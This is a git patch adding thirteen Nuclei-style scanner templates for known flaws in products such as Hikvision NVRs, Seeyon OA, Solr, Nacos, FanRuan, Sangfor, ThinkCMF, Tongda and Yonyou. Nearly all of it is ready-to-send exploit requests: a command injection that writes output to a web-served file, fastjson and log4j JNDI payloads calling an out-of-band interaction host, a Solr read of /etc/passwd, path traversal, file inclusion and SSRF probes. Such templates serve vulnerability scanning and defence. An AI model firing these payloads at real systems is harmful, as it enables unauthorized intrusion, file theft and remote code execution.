From 5e7ecf0575f8ce8fd26930d3c4c94a694574ef5c Mon Sep 17 00:00:00 2001 From: Str1am <48739932+Str1am@users.noreply.github.com> Date: Sun, 7 Aug 2022 17:06:46 +0800 Subject: [PATCH] Add files via upload --- .../frServer-listDir.yaml" | 25 ++++++ .../hivision_ip_rce.yaml" | 23 ++++++ "\346\226\260\345\242\236/nacos-unauth.yaml" | 40 +++++++++ "\346\226\260\345\242\236/pma_unauth.yaml" | 22 +++++ .../seeyon_fastjson.yaml" | 33 ++++++++ "\346\226\260\345\242\236/seeyon_log4j.yaml" | 33 ++++++++ "\346\226\260\345\242\236/solr-fileRead.yaml" | 33 ++++++++ "\346\226\260\345\242\236/solr-rce.yaml" | 24 ++++++ "\346\226\260\345\242\236/swagger-ui.yaml" | 81 +++++++++++++++++++ .../sxf-filedownload.yaml" | 22 +++++ .../thinkCMF_include.yaml" | 22 +++++ .../tongda_sqli2022.yaml" | 17 ++++ "\346\226\260\345\242\236/yongyou-ssrf.yaml" | 19 +++++ 13 files changed, 394 insertions(+) create mode 100644 "\346\226\260\345\242\236/frServer-listDir.yaml" create mode 100644 "\346\226\260\345\242\236/hivision_ip_rce.yaml" create mode 100644 "\346\226\260\345\242\236/nacos-unauth.yaml" create mode 100644 "\346\226\260\345\242\236/pma_unauth.yaml" create mode 100644 "\346\226\260\345\242\236/seeyon_fastjson.yaml" create mode 100644 "\346\226\260\345\242\236/seeyon_log4j.yaml" create mode 100644 "\346\226\260\345\242\236/solr-fileRead.yaml" create mode 100644 "\346\226\260\345\242\236/solr-rce.yaml" create mode 100644 "\346\226\260\345\242\236/swagger-ui.yaml" create mode 100644 "\346\226\260\345\242\236/sxf-filedownload.yaml" create mode 100644 "\346\226\260\345\242\236/thinkCMF_include.yaml" create mode 100644 "\346\226\260\345\242\236/tongda_sqli2022.yaml" create mode 100644 "\346\226\260\345\242\236/yongyou-ssrf.yaml" diff --git "a/\346\226\260\345\242\236/frServer-listDir.yaml" "b/\346\226\260\345\242\236/frServer-listDir.yaml" new file mode 100644 index 0000000..31d926f --- /dev/null +++ "b/\346\226\260\345\242\236/frServer-listDir.yaml" @@ -0,0 +1,25 @@ +id: frServer-listDir + +info: + name: 帆软目录遍历漏洞 + author: Str1am + severity: high + tags: frServer,listDir + +requests: + - method: GET + path: + - "{{BaseURL}}/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true" + - "{{BaseURL}}/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true" + - "{{BaseURL}}/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "isDir" + - "envPath" + part: body + condition: and \ No newline at end of file diff --git "a/\346\226\260\345\242\236/hivision_ip_rce.yaml" "b/\346\226\260\345\242\236/hivision_ip_rce.yaml" new file mode 100644 index 0000000..e0413f9 --- /dev/null +++ "b/\346\226\260\345\242\236/hivision_ip_rce.yaml" @@ -0,0 +1,23 @@ +id: hivision_NVR_RCE + +info: + name: 海康威视_NVR_IP摄像头 + author: str1am + severity: critical + tags: hikvision,rce + +requests: + - raw: + - | + PUT /SDK/webLanguage HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + $(ls -l > webLib/x) + + matchers-condition: and + matchers: + - type: status + status: + - 500 \ No newline at end of file diff --git "a/\346\226\260\345\242\236/nacos-unauth.yaml" "b/\346\226\260\345\242\236/nacos-unauth.yaml" new file mode 100644 index 0000000..5dc5bb4 --- /dev/null +++ "b/\346\226\260\345\242\236/nacos-unauth.yaml" @@ -0,0 +1,40 @@ +id: nacos-unauth + +info: + name: Nacos 1.x - Authentication Bypass + author: taielab,pikpikcu + severity: critical + description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data." + reference: + - https://github.com/alibaba/nacos/issues/4593 + - https://nacos.io/en-us/docs/auth.html + tags: nacos,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" + - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: + User-Agent: Nacos-Server + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: application/json" + part: header + + - type: regex + regex: + - '"username":' + - '"password":' + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/20 \ No newline at end of file diff --git "a/\346\226\260\345\242\236/pma_unauth.yaml" "b/\346\226\260\345\242\236/pma_unauth.yaml" new file mode 100644 index 0000000..b08212e --- /dev/null +++ "b/\346\226\260\345\242\236/pma_unauth.yaml" @@ -0,0 +1,22 @@ +id: pma_unauth + +info: + name: pma未授权访问 + author: str1am + severity: high + tags: pma + +requests: + - method: GET + path: + - "{{BaseURL}}/pma/setup/index.php" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "phpMyAdmin setup" + part: body + condition: and diff --git "a/\346\226\260\345\242\236/seeyon_fastjson.yaml" "b/\346\226\260\345\242\236/seeyon_fastjson.yaml" new file mode 100644 index 0000000..89b892c --- /dev/null +++ "b/\346\226\260\345\242\236/seeyon_fastjson.yaml" @@ -0,0 +1,33 @@ +id: seeyon_fastjson + +info: + name: 致远seeyon_fastjson漏洞 + author: Str1am + severity: critical + tags: seeyon,seeyon_fastjson + +requests: + - raw: + - | + POST /seeyon/main.do?method=changeLocale HTTP/1.1 + Host: {{Hostname}} + Content-Length: 79 + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6 + Cookie: JSESSIONID=5418C5A5511E3BC9806412DD8023386E; loginPageURL="" + Connection: close + + _json_params={"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{interactsh-url}}","autoCommit":true}} + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" \ No newline at end of file diff --git "a/\346\226\260\345\242\236/seeyon_log4j.yaml" "b/\346\226\260\345\242\236/seeyon_log4j.yaml" new file mode 100644 index 0000000..be36f21 --- /dev/null +++ "b/\346\226\260\345\242\236/seeyon_log4j.yaml" @@ -0,0 +1,33 @@ +id: seeyon_log4j + +info: + name: 致远oa-log4j漏洞 + author: Str1am + severity: critical + tags: seeyon,log4j + +requests: + - raw: + - | + GET /seeyon/index.jsp HTTP/1.1 + Host: {{Hostname}} + Pragma: no-cache + Cache-Control: no-cache + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6 + Connection: close + X-Forwarded-For: ${jndi:dns://seeyon.{{interactsh-url}}/test} + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" \ No newline at end of file diff --git "a/\346\226\260\345\242\236/solr-fileRead.yaml" "b/\346\226\260\345\242\236/solr-fileRead.yaml" new file mode 100644 index 0000000..3a9e80f --- /dev/null +++ "b/\346\226\260\345\242\236/solr-fileRead.yaml" @@ -0,0 +1,33 @@ +id: solr-fileRead + +info: + name: solr 任意文件读取 + author: Str1am + severity: high + tags: solr,fileRead + +requests: + - raw: + - | + POST /solr/supplierSearch_V2/debug/dump?param=ContentStreams HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.26.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Content-Length: 27 + Content-Type: application/x-www-form-urlencoded + + stream.file=%2Fetc%2Fpasswd + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "root:x" + - "/bin/bash" + part: body + condition: and \ No newline at end of file diff --git "a/\346\226\260\345\242\236/solr-rce.yaml" "b/\346\226\260\345\242\236/solr-rce.yaml" new file mode 100644 index 0000000..1905afb --- /dev/null +++ "b/\346\226\260\345\242\236/solr-rce.yaml" @@ -0,0 +1,24 @@ +id: solr-rce + +info: + name: solr命令执行 + author: str1am + severity: high + tags: solr + +requests: + - method: GET + path: + - "{{BaseURL}}/solr/supplierSearch_V2/dataimport" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "responseHeader" + - "initArgs" + - "statusMessages" + part: body + condition: and diff --git "a/\346\226\260\345\242\236/swagger-ui.yaml" "b/\346\226\260\345\242\236/swagger-ui.yaml" new file mode 100644 index 0000000..12d4726 --- /dev/null +++ "b/\346\226\260\345\242\236/swagger-ui.yaml" @@ -0,0 +1,81 @@ +id: swagger-api + +info: + name: Public Swagger API + author: pdteam,c-sh0 + severity: info + tags: exposure,api,swagger + +requests: + - method: GET + path: + - "{{BaseURL}}/swagger-ui/swagger-ui.js" + - "{{BaseURL}}/swagger/swagger-ui.js" + - "{{BaseURL}}/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/index" + - "{{BaseURL}}/swagger/index.html" + - "{{BaseURL}}/swagger-ui.html" + - "{{BaseURL}}/swagger/swagger-ui.html" + - "{{BaseURL}}/api/swagger-ui.html" + - "{{BaseURL}}/api-docs/swagger.json" + - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/api_docs" + - "{{BaseURL}}/swagger.json" + - "{{BaseURL}}/swagger.yaml" + - "{{BaseURL}}/swagger/v1/swagger.json" + - "{{BaseURL}}/swagger/v1/swagger.yaml" + - "{{BaseURL}}/api/index.html" + - "{{BaseURL}}/api/docs/" + - "{{BaseURL}}/api/swagger.json" + - "{{BaseURL}}/api/swagger.yaml" + - "{{BaseURL}}/api/swagger.yml" + - "{{BaseURL}}/api/swagger/index.html" + - "{{BaseURL}}/api/swagger/swagger-ui.html" + - "{{BaseURL}}/api/api-docs/swagger.json" + - "{{BaseURL}}/api/api-docs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/swagger.json" + - "{{BaseURL}}/api/swagger-ui/swagger.yaml" + - "{{BaseURL}}/api/apidocs/swagger.json" + - "{{BaseURL}}/api/apidocs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/api-docs" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/apidocs" + - "{{BaseURL}}/api/swagger" + - "{{BaseURL}}/api/swagger/static/index.html" + - "{{BaseURL}}/api/swagger-resources" + - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/__swagger__/" + - "{{BaseURL}}/api/_swagger_/" + - "{{BaseURL}}/api/spec/swagger.json" + - "{{BaseURL}}/api/spec/swagger.yaml" + - "{{BaseURL}}/api/swagger/ui/index" + - "{{BaseURL}}/__swagger__/" + - "{{BaseURL}}/_swagger_/" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" + - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/swagger_doc.json" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "swagger:" + - "Swagger 2.0" + - "\"swagger\":" + - "Swagger UI" + - "**token**:" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git "a/\346\226\260\345\242\236/sxf-filedownload.yaml" "b/\346\226\260\345\242\236/sxf-filedownload.yaml" new file mode 100644 index 0000000..380151f --- /dev/null +++ "b/\346\226\260\345\242\236/sxf-filedownload.yaml" @@ -0,0 +1,22 @@ +id: sxf-filedownload + +info: + name: 深信服文件下载 + author: Str1am + severity: high + tags: solr + +requests: + - method: GET + path: + - "{{BaseURL}}/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "QiHang.Media.Web.Global" + part: body + condition: and \ No newline at end of file diff --git "a/\346\226\260\345\242\236/thinkCMF_include.yaml" "b/\346\226\260\345\242\236/thinkCMF_include.yaml" new file mode 100644 index 0000000..9148b7c --- /dev/null +++ "b/\346\226\260\345\242\236/thinkCMF_include.yaml" @@ -0,0 +1,22 @@ +id: thinkCMF_include + +info: + name: thinkCMF文件包含漏洞 + author: str1am + severity: high + tags: pma + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?a=display&templateFile=README.md" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "官网:http://www.thinkcmf.com" + part: body + condition: and diff --git "a/\346\226\260\345\242\236/tongda_sqli2022.yaml" "b/\346\226\260\345\242\236/tongda_sqli2022.yaml" new file mode 100644 index 0000000..4620897 --- /dev/null +++ "b/\346\226\260\345\242\236/tongda_sqli2022.yaml" @@ -0,0 +1,17 @@ +id: tongda_sqli2022 + +info: + name: 通达oa sql注入 + author: Str1am + severity: high + tags: tongda,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php" + matchers-condition: and + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git "a/\346\226\260\345\242\236/yongyou-ssrf.yaml" "b/\346\226\260\345\242\236/yongyou-ssrf.yaml" new file mode 100644 index 0000000..255a19d --- /dev/null +++ "b/\346\226\260\345\242\236/yongyou-ssrf.yaml" @@ -0,0 +1,19 @@ +id: yongyou-ssrf + +info: + name: yongyou-ssrf + author: str1am + severity: high + tags: yongyou,ssrf + +requests: + - method: GET + path: + - "{{BaseURL}}/uapws/service/nc.pubitf.rbac.IUserPubServiceWS?xsd=http://{{interactsh-url}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" \ No newline at end of file